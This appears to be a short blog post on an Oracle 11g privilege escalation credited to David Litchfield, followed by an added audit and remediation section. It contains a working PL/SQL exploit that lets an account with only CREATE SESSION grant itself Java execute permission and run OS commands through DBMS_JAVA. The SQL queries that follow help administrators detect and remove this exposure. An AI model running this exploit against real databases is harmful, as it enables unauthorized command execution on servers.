David Litchfield really is the best of the best: on Oracle 11g, any user who has only the CREATE SESSION privilege can execute system commands:



-- Step 1: import a Java policy row that grants the current user java.io.FilePermission 'execute'
DECLARE
 POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
 CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','<>','execute','ENABLED' from dual;
 BEGIN
 OPEN C1;
 FETCH C1 BULK COLLECT INTO POL;
 CLOSE C1;
 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
 END;
 /

-- Step 2: use the new permission to run an OS command through the Java wrapper class
select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst') from dual;
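
An audit for the exposure shown above, as an added example that is not part of the original post or of Litchfield's write-up. It assumes a DBA session that can read DBA_TAB_PRIVS and DBA_JAVA_POLICY; the commented-out remediation lines are an assumed hardening step to test before use, not a fix taken from the page.

```sql
-- 1. Who may execute the two packages used in the post?
--    A grantee of PUBLIC is what lets an account holding only
--    CREATE SESSION reach them.
SELECT grantee, owner, table_name, privilege, grantor
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name IN ('DBMS_JVM_EXP_PERMS', 'DBMS_JAVA')
   AND privilege = 'EXECUTE'
 ORDER BY table_name, grantee;

-- 2. Which grantees already hold java.io.FilePermission with the
--    'execute' action? The PL/SQL block in the post creates exactly
--    this kind of row for the calling user, so any ordinary account
--    listed here needs an explanation.
SELECT seq, kind, grantee, type_schema, type_name, name, action, enabled
  FROM dba_java_policy
 WHERE type_name = 'java.io.FilePermission'
   AND LOWER(action) LIKE '%execute%'
 ORDER BY grantee, seq;

-- 3. Cross-check: grantees from query 2 that are ordinary database
--    users (not roles) and hold no DBA role. These are the accounts
--    that should never be able to run OS commands.
SELECT p.grantee, p.name, p.action, p.enabled, p.seq
  FROM dba_java_policy p
  JOIN dba_users u ON u.username = p.grantee
 WHERE p.type_name = 'java.io.FilePermission'
   AND LOWER(p.action) LIKE '%execute%'
   AND NOT EXISTS (SELECT 1
                     FROM dba_role_privs r
                    WHERE r.grantee = p.grantee
                      AND r.granted_role = 'DBA')
 ORDER BY p.grantee, p.seq;

-- 4. Remediation to review and test first (assumption, see lead-in):
--    remove the PUBLIC grant found by query 1 and disable any
--    unexpected policy row found by queries 2 and 3, using its SEQ.
-- REVOKE EXECUTE ON sys.dbms_jvm_exp_perms FROM PUBLIC;
-- EXEC dbms_java.disable_permission(<seq from query 2>);
```

Revoking EXECUTE from PUBLIC can break applications that call these packages legitimately, so compare query 1 against the application's own grants before changing anything.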

Source: http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/